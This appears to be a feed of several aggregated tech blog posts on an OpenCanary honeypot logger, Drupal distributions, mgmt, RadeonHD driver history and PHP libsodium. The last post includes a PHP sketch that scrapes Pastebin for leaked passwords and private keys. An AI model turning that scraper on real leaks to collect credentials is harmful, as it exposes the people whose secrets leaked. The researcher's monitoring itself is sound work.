  • Telnet
  • TFTP
  • VNC

Writing extra modules is very easy; examples are provided. By default, OpenCanary is able to write logs to the console, a file, Syslog, a JSON feed over TCP or an HPFeed. There is no DShield support by default? Never mind, let's add it.

As I said, OpenCanary is very modular and a new logging capability is just a new Python class in the logger.py module:

import logging  # already imported at the top of opencanary/logger.py

class DShieldHandler(logging.Handler):
    def __init__(self, dshield_userid, dshield_authkey, allowed_ports):
        logging.Handler.__init__(self)
        self.dshield_userid = str(dshield_userid)
        self.dshield_authkey = str(dshield_authkey)
        try:
            # Extract the list of allowed ports
            self.allowed_ports = map(int, str(allowed_ports).split(','))
        except:
            # By default, report only port 22
            self.allowed_ports = [ 22 ]

    def emit(self, record):
        ...
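Before wiring it into OpenCanary, the handler can be exercised like any other Python logging handler. Here is a minimal, hypothetical sketch (the credentials and the message are placeholders, and emit() stays elided as above):

# Hypothetical standalone exercise of the DShieldHandler class.
import logging

handler = DShieldHandler("123456", "xxxxxxxx", "22,23")
log = logging.getLogger("opencanary-test")
log.setLevel(logging.INFO)
log.addHandler(handler)
log.info("connection attempt from 192.0.2.1 to port 22")  # delivered to emit()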

The DShield logger needs three arguments in your opencanary.conf file:

"logger": {
    "class" : "PyLogger",
    "kwargs" : {
        "formatters": {
            "plain": {
                "format": "%(message)s"
            }
        },
        "handlers": {
            "dshield": {
                "class": "opencanary.logger.DShieldHandler",
                "dshield_userid": "xxxxxx",
                "dshield_authkey": "xxxxxxxx",
                "allowed_ports": "22,23"
            }
        }
    }
}

The DShield UserID and authentication key are available in your DShield account. I added an ‘allowed_ports’ parameter that contains the list of interesting ports that will be reported to DShield (by default only SSH connections are reported). Now, I'm reporting many more connection attempts:

Daily Connections Report

Besides DShield, JSON logs are processed by my Splunk instance to generate interesting statistics:

OpenCanary Splunk Dashboard

A pull request has been submitted to the authors of OpenCanary to integrate my code. In the meantime, the code is available on my GitHub repository.

[The post Integrating OpenCanary & DShield has been first published on /dev/random]

I published the following diary on isc.sans.org: “How was your stay at the Hotel La Playa?“.

I made the following demo for a customer in the scope of a security awareness event. When speaking to non-technical people, it’s always difficult to demonstrate how easily attackers can abuse of their devices and data. If successfully popping up a “calc.exe” with an exploit makes a room full of security people crazy, it’s not the case for “users”. It is mandatory to demonstrate something that will ring a bell in their mind… [Read more]

[The post [SANS ISC Diary] How was your stay at the Hotel La Playa? has been first published on /dev/random]

February 14, 2017

Yesterday, after publishing a blog post about Nasdaq's Drupal 8 distribution for investor relations websites, I realized I don't talk enough about "Drupal distributions" on my blog. The ability for anyone to take Drupal and build their own distribution is not only a powerful model, but something that is relatively unique to Drupal. To the best of my knowledge, Drupal is still the only content management system that actively encourages its community to build and share distributions.

A Drupal distribution packages a set of contributed and custom modules together with Drupal core to optimize Drupal for a specific use case or industry. For example, Open Social is a free Drupal distribution for creating private social networks. Open Social was developed by GoalGorilla, a digital agency from the Netherlands. The United Nations is currently migrating many of their own social platforms to Open Social.

Another example is Lightning, a distribution developed and maintained by Acquia. While Open Social targets a specific use case, Lightning provides a framework or starting point for any Drupal 8 project that requires more advanced layout, media, workflow and preview capabilities.

For more than 10 years, I've believed that Drupal distributions are one of Drupal's biggest opportunities. As I wrote back in 2006: Distributions allow us to create ready-made downloadable packages with their own focus and vision. This will enable Drupal to reach out to both new and different markets.

To capture this opportunity we needed to (1) make distributions less costly to build and maintain and (2) make distributions more commercially interesting.

Making distributions easier to build

Over the last 12 years we have evolved the underlying technology of Drupal distributions, making them even easier to build and maintain. We began working on distribution capabilities in 2004, when the CivicSpace Drupal 4.6 distribution was created to support Howard Dean's presidential campaign. Since then, every major Drupal release has advanced Drupal's distribution building capabilities.

The release of Drupal 5 marked a big milestone for distributions as we introduced a web-based installer and support for "installation profiles", which was the foundational technology used to create Drupal distributions. We continued to make improvements to installation profiles during the Drupal 6 release. It was these improvements that resulted in an explosion of great Drupal distributions such as OpenAtrium (an intranet distribution), OpenPublish (a distribution for online publishers), Ubercart (a commerce distribution) and Pressflow (a distribution with performance and scalability improvements).

Around the release of Drupal 7, we added distribution support to Drupal.org. This made it possible to build, host and collaborate on distributions directly on Drupal.org. Drupal 7 inspired another wave of great distributions: Commerce Kickstart (a commerce distribution), Panopoly (a generic site building distribution), Opigno LMS (a distribution for learning management services), and more! Today, Drupal.org lists over 1,000 distributions.

Most recently we've made another giant leap forward with Drupal 8. There are at least 3 important changes in Drupal 8 that make building and maintaining distributions much easier:

  1. Drupal 8 has vastly improved dependency management for modules, themes and libraries thanks to support for Composer.
  2. Drupal 8 ships with a new configuration management system that makes it much easier to share configurations.
  3. We moved a dozen of the most commonly used modules into Drupal 8 core (e.g. Views, WYSIWYG, etc), which means that maintaining a distribution requires less compatibility and testing work. It also enables an easier upgrade path.

Open Restaurant is a great example of a Drupal 8 distribution that has taken advantage of these new improvements. The Open Restaurant distribution has everything you need to build a restaurant website and uses Composer when installing the distribution.

More improvements are already in the works for future versions of Drupal. One particularly exciting development is the concept of "inheriting" distributions, which allows Drupal distributions to build upon each other. For example, Acquia Lightning could "inherit" the standard core profile – adding layout, media and workflow capabilities to Drupal core, and Open Social could inherit Lightning - adding social capabilities on top of Lightning. In this model, Open Social delegates the work of maintaining Layout, Media, and Workflow to the maintainers of Lightning. It's not too hard to see how this could radically simplify the maintenance of distributions.

The less effort it takes to build and maintain a distribution, the more distributions will emerge. The more distributions that emerge, the better Drupal can compete with a wide range of turnkey solutions in addition to new markets. Over the course of twelve years we have improved the underlying technology for building distributions, and we will continue to do so for years to come.

Making distributions commercially interesting

In 2010, after having built a couple of distributions at Acquia, I used to joke that distributions are the "most expensive lead generation tool for professional services work". This is because monetizing a distribution is hard. Fortunately, we have made progress on making distributions more commercially viable.

At Acquia, our Drupal Gardens product taught us a lot about how to monetize a single Drupal distribution through a SaaS model. We discontinued Drupal Gardens but turned what we learned from operating Drupal Gardens into Acquia Cloud Site Factory. Instead of hosting a single Drupal distribution (i.e. Drupal Gardens), we can now host any number of Drupal distributions on Acquia Cloud Site Factory.

This is why Nasdaq's offering is so interesting; it offers a powerful example of how organizations can leverage the distribution "as-a-service" model. Nasdaq has built a custom Drupal 8 distribution and offers it as-a-service to their customers. When Nasdaq makes money from their Drupal distribution they can continue to invest in both their distribution and Drupal for many years to come.

In other words, distributions have evolved from an expensive lead generation tool to something you can offer as a service at a large scale. Since 2006 we have known that hosted service models are more compelling but unfortunately at the time the technology wasn't there. Today, we have the tools that make it easier to deploy and manage large constellations of websites. This also includes providing a 24x7 help desk, SLA-based support, hosting, upgrades, theming services and go-to-market strategies. All of these improvements are making distributions more commercially viable.

Last week, I joined the mgmt hackathon, just after Config Management Camp Ghent. It helped me understand how mgmt actually works, and that allowed me to introduce two improvements into the codebase: Prometheus support and an Augeas resource.

I will blog about the Prometheus support later; today I will focus on the Augeas resource.

Defining a resource

Currently, mgmt does not have a DSL; it only uses plain YAML.

Here is how you define an Augeas resource:

---
graph: mygraph
resources:
  augeas:
  - name: sshd_config
    lens: Sshd.lns
    file: "/etc/ssh/sshd_config"
    sets:
      - path: X11Forwarding
        value: no
edges:

As you can see, the augeas resource takes several parameters:

  • lens: the lens file to load
  • file: the path to the file that we want to change
  • sets: the paths/values that we want to change

Setting file will create a Watcher, which means that each time you change that file, mgmt will check if it is still aligned with what you want.
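To make the lens/file/sets semantics more concrete, here is roughly the same change expressed with the python-augeas bindings (an illustration only; mgmt itself uses the Go bindings mentioned below):

# Illustration: what the resource above asks Augeas to do.
# Requires the python-augeas package; Augeas autoloads Sshd.lns for this file.
import augeas

aug = augeas.Augeas()
# Augeas exposes file contents as a tree under /files/<path>.
aug.set("/files/etc/ssh/sshd_config/X11Forwarding", "no")
aug.save()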

Code

The code can be found there: https://github.com/purpleidea/mgmt/pull/128/files

We are using the Go bindings for Augeas: https://github.com/dominikh/go-augeas/ Unfortunately, those bindings only support a recent version of Augeas, so it was necessary to vendor them to make the build pass on Travis.

Future plans

Future plans for this resource are to add more parameters: probably one that behaves like Puppet's "onlyif" parameter, and an "rm" parameter.

February 13, 2017

Nasdaq CIO and vice president Brad Peterson at the Acquia Engage conference showing the Drupal logo on Nasdaq's MarketSite billboard at Times Square NYC

Last October, I shared the news that Nasdaq Corporate Solutions has selected Acquia and Drupal 8 for its next generation Investor Relations and Newsroom Website Platforms. 3,000 of the largest companies in the world, such as Apple, Amazon, Costco, ExxonMobil and Tesla are currently eligible to use Drupal 8 for their investor relations websites.

How does Nasdaq's investor relations website platform work?

First, Nasdaq developed a "Drupal 8 distribution" that is optimized for creating investor relations sites. They started with Drupal 8 and extended it with both contributed and custom modules, documentation, and a default Drupal configuration. The result is a version of Drupal that provides Nasdaq's clients with an investor relations website out-of-the-box.

Next, Nasdaq decided to offer this distribution "as-a-service" to all of their publicly listed clients through Acquia Cloud Site Factory. By offering it "as-a-service", Nasdaq's customers don't have to worry about installing, hosting, upgrading or maintaining their investor relations site. Nasdaq's new IR website platform also ensures top performance, scalability and meets the needs of strict security and compliance standards. Having all of these features available out-of-the-box enables Nasdaq's clients to focus on providing their stakeholders with critical news and information.

Offering Drupal as a web service is not a new idea. In fact, I have been talking about hosted service models for distributions since 2007. It's a powerful model, and Nasdaq's Drupal 8 distribution as-a-service is creating a win-win-win-win. It's good for Nasdaq's clients, good for Nasdaq, good for Drupal, and in this case, good for Acquia.

It's good for Nasdaq's customers because it provides them with a platform that incorporates the best of both worlds; it gives them the maintainability, reliability, security and scalability that comes with a cloud offering, while still providing the innovation and freedom that comes from using Open Source.

It is great for Nasdaq because it establishes a business model that leverages Open Source. It's good for Drupal because it encourages Nasdaq to invest back into Drupal and their Drupal distribution. And it's obviously good for Acquia as well, because we get to sell our Acquia Site Factory Platform.

If you don't believe me, take Nasdaq's word for it. In the video below, which features Stacie Swanstrom, executive vice president and head of Nasdaq Corporate Solutions, you can see how Nasdaq pitches the value of this offering to their customers. Swanstrom explains that with Drupal 8, Nasdaq's IR Website Platform brings "clients the advantages of open source technology, including the ability to accelerate product enhancements compared to proprietary platforms".

Soon it will be a decade since we started the RadeonHD driver, with which we pushed ATI to a point of no return and got a proper C-coded graphics driver and freely accessible documentation out. We all know just what happened to this in the end, and I will make a rather complete write-up spanning multiple blog entries over the following months. But while I was digging out backed-up home directories for information, I came across this...

It is a copy of the content of an email I sent to an executive manager at SuSE/Novell, a text file called bridgmans_games.txt. This was written in July 2008, after the RadeonHD project gained what was called "Executive oversight". After the executive had seen several of John Bridgman's games first-hand, he asked me to provide him with a timeline of some of the games he had played with us. The explanation below covers only things that I knew this executive was not aware of, and it covers a year of RadeonHD development^Wstruggle, from July 2007 until April 2008. It took me quite a while to compile this, and it was a pretty tough task mentally, as it finally showed, unequivocally, just how we had been played all along. After this email was read by this executive, he and my department lead took me to lunch and told me to let this die out slowly, and to not make a fuss. Apparently, I should have counted myself lucky to see this sort of games being played this early on in my career.

This is the raw copy; only the names of some people who are not in the public eye have been redacted (you know who you are), and some other names were clarified. All changes are marked with [].

These are:
SuSE Executive manager: [EXEC]
SuSE technical project manager: [TPM]
AMD manager (from a different department than ATI): [AMDMAN]
AMD liaison: [SANTA] (as he was the one who handed me and Egbert Eich a 1 cubic meter box full of graphics cards ;))

[EXEC], i made a rather extensive write-up about the goings-on throughout 
the whole project. I hope this will not intrude too much on your time, 
please have a quick read through it, mark what you think is significant and 
where you need actual facts (like emails that were sent around...) Of 
course, this is all very subjective, but for most of this emails can be 
provided to back things up (some things were said on the weekly technical 
call only).

First some things that happened beforehand...

Before we came around with the radeonhd driver, there were two projects 
going
already...

One was Dave Airlie who claimed he had a working driver for ATI Radeon R500
hardware. This was something he wrote during 2006, from information under 
NDA, and this nda didn't allow publication. He spent a lot of time bashing 
ATI for it, but the code was never seen, even when the NDA was partially 
lifted later on.

The other was a project started in March 2007 by Nokia's Daniel Stone and
Ubuntu's [canonical's] Matthew Garreth. The avivo driver. This driver was a
driver separate from the -ati or -radeon drivers, under the GPL, and written
from scratch by tracing the BIOS and tracking register changes [(only the
latter was true)]. Matthew and Daniel were only active contributors for the
first few weeks and quickly lost interest. The bulk of the development was
taken over by Jerome Glisse after that.

Now... Here is where we encounter John [Bridgman]...

Halfway july, when we first got into contact with Bridgman, he suddenly 
started bringing up AtomBIOS. When then also we got the first lowlevel 
hardware spec, but when we asked for hardware details, how the different 
blocks fitted together, we never got an answer as that information was said 
to not be available. We also got our hands on some of the atombios 
interpreter code, and a rudimentary piece of documentation explaining how to 
handle the atombios bytecode. So Matthias [Hopf] created an atombios 
disassembler to help us write up all the code for the different bits. And 
while we got some further register information when we asked for it, 
bridgman kept pushing atombios relentlessly.

This whining went on and on, until we, late august, decided to write up a
report of what problems we were seeing with atombios, both from an interface 
as from an actual implementation point of view. We never got even a single 
reply to this report, and we billed AMD 10 or so mandays, and [with] 
bridgman apparently berated, as he never brought the issue up again for the 
next few months... But the story of course didn't end there of course.

At the same time, we wanted to implement one function from atomBIOS at the
time: ASICInit. This function brings the hardware into a state where
modesetting can happen. It replaces a full int10 POST, which is the 
standard, antique way of bringing up VGA on IBM hardware, and ASICInit 
seemed like a big step forward. John organised a call with the BIOS/fglrx 
people to explain to us what ASICInit offered and how we could use it. This 
is the only time that Bridgman put us in touch with any ATI people directly. 
The proceedings of the call were kind of amusing... After 10 minutes or so, 
one of the ATI people said "for fglrx, we don't bother with ASICInit, we 
just call the int10 POST". John then quickly stated that they might have to 
end the call because apparently other people were wanting to use this 
conference room. The call went on for at least half an hour longer, and john 
from time to time stated this again. So whether there was truth to this or 
not, we don't know, it was a rather amusing coincidence though, and we of 
course never gained anything from the call.

Late august and early september, we were working relentlessly towards 
getting our driver into a shape that could be exposed to the public. 
[AMDMAN] had warned us that there was a big marketing thing planned for the 
kernel summit in september, but we never were told any of this through our 
partner directly. So we were working like maniacs on getting the driver in a 
state so that we could present it at the X Developers Summit in Cambridge.

Early september, we were stuck on several issues because we didn't get any
relevant information from Bridgman. In a mail sent on september 3, [TPM] 
made the following statement: "I'm not willing to fall down to Mr. B.'s mode 
of working nor let us hold up by him. They might (or not) be trying to stop 
the train - they will fail." It was very very clear then already that things 
were not being played straight.

Bridgman at this point was begging to see the code, so we created a copy of 
a (for us) working version, and handed this over on september the 3rd as 
well. We got an extensive review of our driver on a very limited subset of 
the hardware, and we were mainly bashed for producing broken modes (monitor 
synced off). This had of course nothing to do with us using direct 
programming, as this was some hardware limits [PLL] that we eventually had 
to go and find ourselves. Bridgman never was able to help provide us with 
suitable information on what the issue could be or what the right limits 
were, but the fact that the issue wasn't to be found in atombios versus 
direct programming didn't make him very happy.

So on the 5th of september, ATI went ahead with its marketing campaign, the 
one which we weren't told about at all. They never really mentioned SUSE's 
role in this, and Dave Airlie even made a blog entry stating how he and Alex 
were the main actors on the X side. The SUSE role in all of this was 
severely downplayed everywhere, to the point where it became borderline 
insulting. It was also one of the first times where we really felt that 
Bridgman maybe was working more closely with Dave and Alex than with us.

We then had to rush off to the X Developers Summit in Cambridge. While we 
met ATIs Matthew Tippett and Bridgman beforehand, it was clear that our role 
in this whole thing was being actively downplayed, and the attitude towards 
egbert and me was predominantly hostile. The talk bridgman and Tippett gave 
at XDS once again fully downplayed our effort with the driver. During our 
introduction of the radeonHD driver, John Bridgman handed Dave Airlie a CD 
with the register specs that went around the world, further reducing our 
relevance there. John stated, quite noisily, in the middle of our 
presentation, that he wanted Dave to be the first to receive this 
documentation. Plus, it became clear that Bridgman was very close to Alex 
Deucher.

The fact that we didn't catch all supper/dinner events ourselves worked 
against us as well, as we were usually still hacking away feverishly at our 
driver. We also had to leave early on the night of the big dinner, as we had 
to come back to nürnberg so that we could catch the last two days of the 
Labs conference the day after. This apparently was a mistake... We later 
found a picture (http://flickr.com/photos/cysglyd/1371922101/) that has the 
caption "avivo de-magicifying party". This shows Bridgman, Tippett, Deucher, 
all the redhat and intel people in the same room, playing with the (then 
competing) avivo driver. This picture was taken while we were on the plane 
back to nürnberg. Another signal that, maybe, Mr Bridgman isn't every 
committed to the radeonhd driver. Remarkably though, the main developer 
behind the avivo driver, Jerome Glisse, is not included here. He was found 
to be quite fond of the radeonhd driver and immediately moved on to 
something else as his goal was being achieved by radeonhd now.

On monday the 17th, right before the release, ATI was throwing up hurdles... 
We suddenly had to put AMD copyright statements on all our code, a 
requirement never made for any AMD64 work which is as far as i understood 
things also invalid under german copyright law. This was a tough nut for me 
to swallow, as a lot of the code in radeonhd modesetting started life 5years 
earlier in my unichrome driver. Then there was the fact that the atombios 
header didn't come with an acceptable license and copyright statement, and a 
similar situation for the atombios interpreter. The latter two gave Egbert a 
few extra hours of work that night.

I contacted the phoronix.com owner (Michael Larabel) to talk to him about an 
imminent driver release, and this is what he stated: "I am well aware of the 
radeonHD driver release today through AMD and already have some articles in 
the work for posting later today." The main open source graphics site had 
already been given a story by some AMD people, and we were apparently not 
supposed to be involved here. We managed to turn this article around there 
and then, so that it painted a more correct picture of the situation. And 
since then, we have been working very closely with Larabel to make sure that 
our message gets out correctly.

The next few months seemed somewhat uneventful again. We worked hard on 
making our users happy, on bringing our driver up from an initial 
implementation to a full featured modesetting driver. We had to 
painstakingly try to drag more information out of John, but mostly find 
things out for ourselves. At this time the fact that Dave Airlie was under 
NDA still was mentioned quite often in calls, and John explained that this 
NDA situation was about to change. Bridgman also brought up that he had 
started the procedure to hire somebody to help him with documentation work 
so that the flow of information could be streamlined. We kind of assumed 
that, from what we saw at XDS, this would be Alex Deucher, but we were never 
told anything.

Matthias got in touch with AMDs GPGPU people through [AMDMAN], and we were 
eventually (see later) able to get TCore code (which contains a lot of very
valuable information for us) out of this. Towards the end of oktober, i 
found an article online about AMDs upcoming Rv670, and i pasted the link in 
our radeonhd irc channel. John immediately fired off an email explaining 
about the chipset, apologising for not telling us earlier. He repeated some 
of his earlier promises of getting hardware sent out to us quicker. When the 
hardware release happened, John was the person making statements to the open 
source websites (messing up some things in the process), but [SANTA] was the 
person who eventually sent us a board.

Suddenly, around the 20th of november, things started moving in the radeon
driver. Apparently Alex Deucher and Dave Airlie had been working together 
since November 3rd to add support for r500 and r600 hardware to the radeon 
driver. I eventually dug out a statement on fedora devel, where redhat guys, 
on the last day of oktober, were actively refusing our driver from being 
accepted. Dave Airlie stated the following: "Red Hat and Fedora are 
contemplating the future wrt to AMD r5xx cards, all options are going to be 
looked at, there may even be options that you don't know about yet.."

They used chunks of code from the avivo driver, chunks of code from the
radeonhd driver (and the bits where we spent ages finding out what to do), 
and they implemented some parts of modesetting using AtomBIOS, just like 
Bridgman always wanted it. On the same day (20th) Alex posted a blog entry 
about being hired by ATI as an open source developer. Apparently, Bridgman 
mentioned that Dave had found something when doing AtomBIOS on the weekly 
phonecall beforehand. So Bridgman had been in close communication with Dave 
for quite a while already.

Our relative silence and safe working ground was shattered. Suddenly it was
completely clear that Bridgman was playing a double game. As some diversion
mechanisms, John now suddenly provided us with the TCore code, and suddenly
gave us access to the AMD NDA website, and also told us on the phone that 
Alex is not doing any Radeon work in his worktime and only does this in his 
spare time. Surely we could not be against this, as surely we too would like 
to see a stable and working radeon driver for r100-r400. He also suddenly 
provided those bits of information Dave had been using in the radeon driver, 
some of it we had been asking for before and never got an answer to then.

We quickly ramped up the development ourselves and got a 1.0.0 driver 
release out about a week later. John in the meantime was expanding his 
marketing horizon, he did an interview with the Beyond3D website (there is 
of course no mention about us), and he started doing some online forums 
(phoronix), replying to user posts there, providing his own views on 
"certain" situations (he has since massively increased his time on that 
forum).

One interesting result of the competing project is that suddenly we were
getting answers to questions we had been asking for a long time. An example 
of such an issue is the card internal view of where the cards own memory 
resides. We spent weeks asking around, not getting anywhere, and suddenly 
the registers were used in the competing driver, and within hours, we got 
the relevant information in emails from Mr Bridgman (November 17 and 20, 
"Odds and Ends"). Bridgman later explained that Dave Airlie knew these 
registers from his "previous r500 work", and that Dave asked Bridgman for 
clearance for release, which he got, after which we also got informed about 
these registers as well. The relevant commit message in the radeon driver 
predates the email we received with the related information by many hours.

[AMDMAN] had put us in touch with the GPGPU people from AMD, and matthias 
and one of the GPGPU people spent a lot of time emailing back and forth. But
suddenly, around the timeframe where everything else happened (competing
driver, alex getting hired), John suddenly conjured up the code that the 
GPGPU people had all along: TCore. This signalled to us that John had caught 
our plan to bypass him, and that he now took full control of the situation. 
It took about a month before John made big online promises about how this 
code could provide the basis for a DRM driver, and that it would become 
available to all soon. We managed to confirm, in a direct call with both the 
GPGPU people and Mr Bridgman that the GPGPU people had no idea about that 
John intended to make this code fully public straigth away. The GPGPU people 
assumed that Johns questions were fully aimed at handing us the code without 
us getting tainted, not that John intended to hand this out publically 
immediately. To this day, TCore has not surfaced publically, but we know 
that several people inside the Xorg community have this code, and i 
seriously doubt that all of those people are under NDA with AMD.

Bridgman also ramped up the marketing campaign. He did an interview with
Beyond3D.com on the 30th where he broadly smeared out the fact that a 
community member was just hired to work with the community. John of course 
completely overlooked the SUSE involvement in everything. An attempt to 
rectify this with an interview of our own to match never materialised due to 
the heavy time constraints we are under.

On the 4th of december, a user came to us asking what he should do with a
certain RS600 chipset he had. We had heard from John that this chip was not
relevant to us, as it was not supposed to be handled by our driver (the way 
we remember the situation), but when we reported this to John, he claimed 
that he thought that this hardware never shipped and that it therefor was 
not relevant. The hardware of course did ship, to three different vendors, 
and Egbert had to urgently add support for it in the I2C and memory 
controller subsystems when users started complaining.

One very notable story of this time is how the bring-up of new hardware was
handled. I mentioned the Rv670 before, we still didn't get this hardware at
this point, as [SANTA] was still trying to get his hands on this. What we 
did receive from [SANTA] on the 11th of december was the next generation 
hardware, which needed a lot of bring-up work: rv620/rv635. This made us 
hopeful that, for once, we could have at least basic support in our driver 
on the same day the hardware got announced. But a month and a half later, 
when this hardware was launched, John still hadn't provided any information. 
I had quite a revealing email exchange with [SANTA] about this too, where he 
wondered why John was stalling this. The first bit of information that was 
useful to us was given to us on February the 9th, and we had to drag a lot 
of the register level information out of John ourselves. Given the massive 
changes to the hardware, and the induced complications, it of course took us 
quite some time to get this work finished. And this fact was greedily abused 
by John during the bring-up time and afterwards. But what he always 
overlooks is that it took him close to two months to get us documentation to 
use even atombios successfully.

The week of december the 11th is also where Alex was fully assimilated into
ATI. He of course didn't do anything much in his first week at AMD, but in 
his second week he started working on the radeon driver again. In the weekly 
call then John re-assured us that Alex was doing this work purely in his 
spare time, that his task was helping us get the answers we needed. In all 
fairness, Alex did provide us with register descriptions more directly than 
John, but there was no way he was doing all this radeon driver work in his 
spare time. But it would take John another month to admit it, at which time 
he took Alex working on the radeon driver as an acquired right.

Bridgman now really started to spend a lot of time on phoronix.com. He 
posted what i personally see as rather biased comparisons of the different 
drivers out there, and he of course beat the drums heavily on atombios. This 
is also the time where he promised the TCore drop.

Then games continued as usual for the next month or so, most of which are
already encompassed in previous paragraphs.

One interesting sidenote is that both Alex and John were heavy on rebranding
AtomBIOS. They actively used the word scripts for the call tables inside
atombios, and were actively labelling C modesetting code as legacy. Both 
quite squarely go in against the nature of AtomBIOS versus C code.

Halfway february, discussions started to happen again about the RS690 
hardware. Users were having problems. After a while, it became clear that 
the RS690, all along, had a display block called DDIA capable of driving a 
DVI digital signal. RS690 was considered to be long and fully supported, and 
suddenly a major display block popped into life upon us. Bridgmans excuse 
was the same as with the RS600; he thought this never would be used in the 
first place and that therefor we weren't really supposed to know about this.

On the 23rd and 24th of February, we did FOSDEM. As usual, we had an X.org 
Developers Room there, for which i did most of the running around. We worked
with Michael Larabel from phoronix to get the talks taped and online. 
Bridgman gave us two surprises at FOSDEM... For one, he released 3D 
documentation to the public, we learned about this just a few days before, 
we even saw another phoronix statement about TCore being released there and 
then, but this never surfaced.

We also learned, on friday evening, that the radeon driver was about to gain
Xvideo support for R5xx and up, through textured video code that alex had 
been working on. Not only did they succeed in stealing the sunshine away 
from the actual hard work (organising fosdem, finding out and implementing 
bits that were never supposed to be used in the first place, etc), they gave 
the users something quick and bling and showy, something we today still 
think was provided by others inside AMD or generated by a shader compiler. 
And this to the competing project.

At FOSDEM itself Bridgman of course was full of stories. One of the most
remarkable ones, which i overheard when on my knees clearing up the 
developers room, was bridgman talking to the Phoronix guy and some community 
members, stating that people at ATI actually had bets running on how long it 
would take Dave Airlie to implement R5xx 3D support for the radeon driver. 
He said this loudly, openly and with a lot of panache. But when this support 
eventually took more than a month, i took this up with him on the phonecall, 
leading of course to his usual nervous laughing and making up a bit of a 
coverstory again.

Right before FOSDEM, Egbert had a one-on-one phonecall with Bridgman, hoping 
to clear up some things. This is where we first learned that bridgman had 
sold atombios big time to redhat, but i think you now know this even better 
than i do, as i am pretty hazy on details there. Egbert, if i remember 
correctly, on the very same day, had a phonecall with redhat's Kevin Martin 
as well. But since nothing of this was put on mail and i was completely 
swamped with organising FOSDEM, i have no real recollection of what came out 
of that.

Alex then continued with his work on radeon, while being our only real 
point of contact for any information. There were several instances where our 
requests for information resulted in immediate commits to the radeon driver, 
where issues were fixed or bits of functionality were added. Alex also ended 
up adding RENDER acceleration to the radeon driver, and when Bridgman was in
Nuernberg, we clearly saw how Bridgman sold this to his management: alex was
working on bits that were meant to be ported directly to RadeonHD.

In march, we spent our time getting rv620/635 working, dragging information,
almost register per register out of our friends. We learned about the 
release of RS780 at CEBIT, meaning that we had missed yet another 
opportunity for same day support. John had clearly stated, at the time of 
the rv620/635 launch that "integrated parts are the only place where we are 
'officially' trying to have support in place at or very shortly after 
launch".

And with that, we pretty much hit the time frame when you, [EXEC], got
involved...

One interesting, relatively new development is Kgrids. Kgrids is some code
written by some ATI people that contains useful information for driver
development, especially for the DRM. John Bridgman had already told the
Phoronix author 2-3 weeks ago that he had this and that he was planning to
release it immediately. The Phoronix author informed me right away, but the
release of this code has not happened so far. Last Thursday, Bridgman brought
up Kgrids in the weekly technical phone call... When asked how long he had
known about this, he admitted that they had known about it for several weeks
already, which makes me wonder why we weren't informed earlier, and why we
suddenly were informed then...


As said, the above, combined with what was already known to this executive, and the games he saw being played first-hand from April 2008 through June 2008, marked the beginning of the end of the RadeonHD project.

I too disconnected myself more and more from development on this, with Egbert taking the brunt of the work. I instead spent more time on the next SuSE enterprise release, having fun doing something productive and with a future. Then, after FOSDEM 2009, when 24 people at the SuSE Nuernberg office were laid off, I was almost relieved to be amongst them.

Time flies.

February 12, 2017


This actually makes PHP the first language, ahead of Erlang and Go, to get a secure crypto library in its core.

Of course, having the ability doesn't necessarily mean it gets used properly by developers, but this is a major step forward.

The vote for the Libsodium RFC has been closed. The final tally is 37 yes, 0 no.

I'll begin working on the implementation with the desired API (sodium_* instead of \Sodium\*).

Thank you to everyone who participated in these discussions over the past year or so and, of course, everyone who voted for better cryptography in PHP 7.2.

Scott Arciszewski

@CiPHPerCoder

Source: php.internals: [RFC][Vote] Libsodium vote closes; accepted (37-0)

As a reminder, the Libsodium RFC:

Title: PHP RFC: Make Libsodium a Core Extension

Libmcrypt hasn't been touched in eight years (last release was in 2007), leaving openssl as the only viable option for PHP 5.x and 7.0 users.

Meanwhile, libsodium bindings have been available in PECL for a while now, and have reached stability.

Libsodium is a modern cryptography library that offers authenticated encryption, high-speed elliptic curve cryptography, and much more. Unlike other cryptography standards (which are a potluck of cryptography primitives; i.e. WebCrypto), libsodium is comprised of carefully selected algorithms implemented by security experts to avoid side-channel vulnerabilities.

Source: PHP RFC: Make Libsodium a Core Extension
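To give a feel for the new API, here is a minimal sketch of authenticated secret-key encryption using the sodium_* functions as they will ship in PHP 7.2; the message and variable names are purely illustrative and not taken from the RFC:

<?php
// Requires PHP 7.2 with the bundled sodium extension.
// Authenticated secret-key encryption (crypto_secretbox: XSalsa20 + Poly1305).
$key   = sodium_crypto_secretbox_keygen();                  // 32-byte secret key
$nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);  // 24-byte nonce, never reuse with the same key

$ciphertext = sodium_crypto_secretbox('attack at dawn', $nonce, $key);

// Decryption verifies the authentication tag; a tampered message returns false.
$plaintext = sodium_crypto_secretbox_open($ciphertext, $nonce, $key);
if ($plaintext === false) {
    throw new RuntimeException('Message forged or corrupted');
}

The nonce can be stored alongside the ciphertext; it does not need to be secret, only unique per key.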

The post PHP 7.2 to get modern cryptography into its standard library appeared first on ma.ttias.be.

Pastebin.com is one of my favourite playgrounds. I’m monitoring the content of all pasties posted on this website. My goal is to find juicy data like configurations, database dumps and leaked credentials. Sometimes you can also find malicious binary files.
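As an illustration of what such monitoring can look like, here is a hypothetical PHP sketch polling Pastebin's scraping API (a Pro feature that requires a whitelisted IP). The endpoint, JSON field names and keyword list are assumptions for illustration, not the author's actual tooling:

<?php
// Hypothetical monitor: poll the Pastebin scraping API and grep new pasties
// for interesting keywords. Endpoint and field names are assumed from the
// public documentation (Pro account with whitelisted IP required).
$endpoint = 'https://scrape.pastebin.com/api_scraping.php?limit=100';
$keywords = ['password', 'BEGIN RSA PRIVATE KEY', 'mysqldump'];

$pasties = json_decode(file_get_contents($endpoint), true) ?: [];
foreach ($pasties as $paste) {
    // Each entry is assumed to expose a raw URL ("scrape_url") for the content.
    $content = file_get_contents($paste['scrape_url']);
    foreach ($keywords as $keyword) {
        if (stripos($content, $keyword) !== false) {
            printf("Hit: %s matches '%s'\n", $paste['full_url'], $keyword);
        }
    }
}

A real setup would run this from cron, de-duplicate on the paste key and rate-limit the fetches.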

For sure, I knew that I’m not the only one interested in the pastebin.com content. Plenty of researchers and organizations like CERTs and SOCs are doing the same, but I was very surprised by the number of hits that I got on my latest pastie:

Pastebin Hits

For the purpose of my last ISC diary, I posted some data on pastebin.com and did not communicate the link by any means. Before posting the diary, I had a quick look at my pastie and it already had 105 unique views! It had been posted only a few minutes before.

Conclusion: Think twice before posting data to pastebin. Even if you quickly delete your pastie, chances are that it will already have been scraped by many robots (and mine! ;-))

[The post Think Twice before Posting Data on Pastebin! has been first published on /dev/random]

